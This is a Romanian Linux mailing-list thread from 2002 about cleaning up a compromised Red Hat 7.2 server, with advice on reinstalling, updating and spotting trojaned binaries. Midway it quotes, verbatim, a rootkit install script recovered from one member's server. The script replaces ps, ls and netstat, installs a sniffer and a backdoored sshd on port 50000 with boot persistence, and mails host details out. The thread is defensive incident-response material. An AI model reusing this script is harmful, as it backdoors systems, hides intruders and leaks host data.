Hello Petre, Saturday, May 25, 2002, 5:14:28 PM, you wrote:
PD> 2 mbps cu abuse.zone.ro sa zicem.. sa vedem intai ca exista interes din partea "target-ului" :) Gusherul PD> /me PD> At 01:08 PM 5/25/02 -0700, you wrote: >>Hello paul, >> >>Un lucru tot e bun. Ca mi-ai zis adresa de mail. Care mai are >>rootkituri sariti cu emailurile unde se duc info despre server. Asha >>mai scapam de ei oleak:) >> >>Gushterul >>P.S. Hapropo ce-ar fi o pagina de web cu toti? Nu sa punem rk acolo ci >>info sha shthie homu' lha khare sha hai dhea in khap. Reformulez cine >>face hosting? :) >> >>Friday, May 24, 2002, 11:38:02 PM, you wrote: >> >>pzeur> Reinstall tot dupa care te inregistrezi cu rhn_register la rh >>network si >>pzeur> dupa ce ai inscris sitemul tau la ei poti folosi "up2date -u" pentru >>pzeur> update-uri la zi. Seamana a wingoz dar merge bine. >>pzeur> Daca ai probleme cu conexiunea il lasi sa aduca headerele, pe care le >>pzeur> pune in /var/spool/up2date, (ai de downloadat vreo 200 mb de updateuri) >>pzeur> cauta un mirror apropiat la updates.redhat.com (ex: ftp.ubbcluj.ro) >>aduci >>pzeur> de acolo pachetele corespunzatoare headerelor pe care le pui in >>pzeur> /var/spool/up2date si repornesti "up2date -u". >> >> >>pzeur> si mie mi-a gaurit wu-ftpd-u din rh7.2 dar rootkitu era pentru alt >>sistem >>pzeur> asa ca l-am gasit dupa vreo 3 ore (asteptam sa se termine "up2date >>-u" cu >>pzeur> serviciile pornite de bou ce am fost:) cind ps, ls , netstat nu >>mergeau. >>pzeur> asa ca am adus repede respectivele app de pe alt sistem, si surpriza... >>pzeur> nfsd -q -p 50000 care era un sshd modificat. m-am uitat prin directoare >>pzeur> si am gasit in /var/ftp/ un director care nu era acolo ultima data >>cind m-am >>pzeur> uitat. Cautind prin fisierele din el dau de o cale la ceva director de >>pzeur> librarii unde era cam asa ceva: >>pzeur> . >>pzeur> .. >>pzeur> .lib >>pzeur> .tooz >> >>pzeur> in .tooz era fisierul install: >>pzeur> #private version from cur / not hacked by lamme assz as Em|nem or >>others! >>pzeur> #phear my reverge all u mother fuckers >>pzeur> # rk made ONLY 4 my friends ond ONLY 4 fun >>pzeur> #!/bin/sh >>pzeur> unset HISTFILE >>pzeur> chattr -iau /usr/src/linux/arch/alpha/lib/.lib/ >>pzeur> chattr -iau /bin/ps >>pzeur> chattr -iau /bin/ls >>pzeur> chattr -iau /bin/netstat >>pzeur> chattr -iau /bin/lpd >>pzeur> rm -rf /etc/ssh* >>pzeur> clear >>pzeur> mkdir -p /usr/src/linux/arch/alpha/lib/.lib >>sh sysinfo1 >> new-host >>pzeur> sh ssh_random_key >>pzeur> mv .1proc /usr/src/linux/arch/alpha/lib/.lib/ >>pzeur> mv .1addr /usr/src/linux/arch/alpha/lib/.lib/ >>pzeur> mv .1file /usr/src/linux/arch/alpha/lib/.lib/ >>pzeur> mv /bin/ps /usr/src/linux/arch/alpha/lib/.lib/.ps >>pzeur> mv /bin/ls /usr/src/linux/arch/alpha/lib/.lib/.ls >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1proc >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1addr >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1file >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ps >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ls >>pzeur> mv ps /bin/ps >>pzeur> mv ls /bin/ls >>pzeur> mv /bin/netstat /usr/src/linux/arch/alpha/lib/.lib/ >>pzeur> mv netstat /bin/netstat >>pzeur> chown root.root /bin/ls >>pzeur> chown root.root /bin/ps >>pzeur> chown root.root /bin/netstat >>pzeur> mv linsniffer /bin/lpd >>pzeur> rm -rf /etc/ssh* >>pzeur> rm -rf /usr/man/man8/rpc.rstatd.8 >>pzeur> rm -rf /usr/sbin/rpc.rstatd >>pzeur> rm -rf /usr/sbin/rpc* >>pzeur> lpd & >>pzeur> ./lpd >>pzeur> mv sshd /bin/nfsd >>pzeur> mv -f sshd_config /etc/ >>pzeur> mv -f ssh_host_key /etc/ >>pzeur> mv -f ssh_random_seed /etc/ >>pzeur> mv -f ssh_host_key.pub /etc/ >>pzeur> rm -rf ssh_random_key >>pzeur> chattr +iau /bin/nfsd >>pzeur> chattr +iau /etc/sshd_config >>pzeur> chattr +iau /etc/ssh_host_key >>pzeur> chattr +iau /etc/ssh_random_seed >>pzeur> chattr +iau /etc/ssh_host_key.pub >>pzeur> nfsd -q -p 50000 >>pzeur> echo "nfsd -q -p 50000" >>/etc/rc.d/rc.sysinit >>pzeur> echo "nfsd -q -p 50000" >>/etc/rc.d/init.d/inet >>./sysinfo1 >> new-host |mail -s "root6666" [EMAIL PROTECTED] >>pzeur> cat new-host |mail -s >>pzeur> #-----done with ssh---- >>pzeur> killall -9 portmap >>pzeur> killall rpc.statd >>pzeur> rm -f /usr/sbin/rpc.statd >>echo "ftp">>>/etc/ftpusers >>echo "root">>>/etc/ftpusers >>pzeur> cat /proc/cpuinfo >>pzeur> mv pwd /dev/capi20.20 >>pzeur> rm -f sysinfo1 >>pzeur> rm -f sysinfo >>pzeur> rm -f new-host >>pzeur> rm -f sshd >>pzeur> cd .. >>pzeur> rm -rf s.tgz >>pzeur> clear >>pzeur> echo "****************************7.1***************************" >>pzeur> echo "Oki" >>pzeur> echo "***********************SpUrKaTu&TrUnKS********************" >> >> >>pzeur> mai era un fisier .1addr: >>pzeur> 2 194.105 >>pzeur> 3 6666 >>pzeur> 3 6667 >>pzeur> 3 54789 >>pzeur> 3 31337 >>pzeur> 3 6668 >>pzeur> 3 6669 >>pzeur> 3 6666 >>pzeur> 2 194.102.233 >>pzeur> 2 209.142.209.161 >>pzeur> 2 217.10 >>pzeur> 2 213.233 >> >> >>pzeur> am pastrat fisierele ca poate nu se stie niciodata, mai sunt >>printre ele : >>pzeur> hideps install lpd sense string tcp.log utils wipe >>pzeur> .1addr .1file .1proc .ls netstat .ps >> >>pzeur> cam asta ma mai gasit >> >>pzeur> in general e bine ai copii originale dupa ls, ps, netstat >> >>pzeur> bafta >> >> >>pzeur> On Fri, 24 May 2002, Gabriel Stoicea wrote: >> >> >> Rulez un sistem RH 7.2 pe care am depistat o intruziune. >> >> Mi-am dat seama de asta pentru ca nu mergeau corect anumite comenzi. >> >> 1. Am reparat pachetele compromise (net-tools, fileutils si procps) cu >> >> rpm -U --force ... >> >> 2. Am download-at chkrootkit si chkproc imi spune ca ruleaza 2 procese >> >> ascunse: >> >> - You have 1 process hidden for readdir command >> >> - You have 1 process hidden for ps command >> >> 3. chkrootkit "intepeneste" la verificare la pozitia >> >> Checking 'aliens'... >> >> 4. Cand rebootez PC-ul imi da niste erori la demontarea partitiei /usr >> >> --> Illegal seek >> >> 5. Cand bootez imi apar cateva mesaje cum ca un program este shareware >> >> si nu stiu ce... si ca asculta pe portul 7000 >> >> 6. In boot.log apare linia >> >> ... Starting backdoor daemon... Done, pid=... >> >> Acum va intreb: >> >> - mai pot fi si alte pachete compromise in afara de cele numite? >> >> - ce este cu acele procese ascunse si cum scap de ele? >> >> - de ce intepeneste chkrootkit? >> >> - daca este intr-adevar vorba de backdoor, cum scap de el? >> >> >> >> Cu speranta ca nu va "sictiresc" cu un mail asa de lung, va multumesc >> >> anticipat pentru ajutor. >> >> Gaby --- Pentru dezabonare, trimiteti mail la [EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. REGULI, arhive si alte informatii: http://www.lug.ro/mlist/
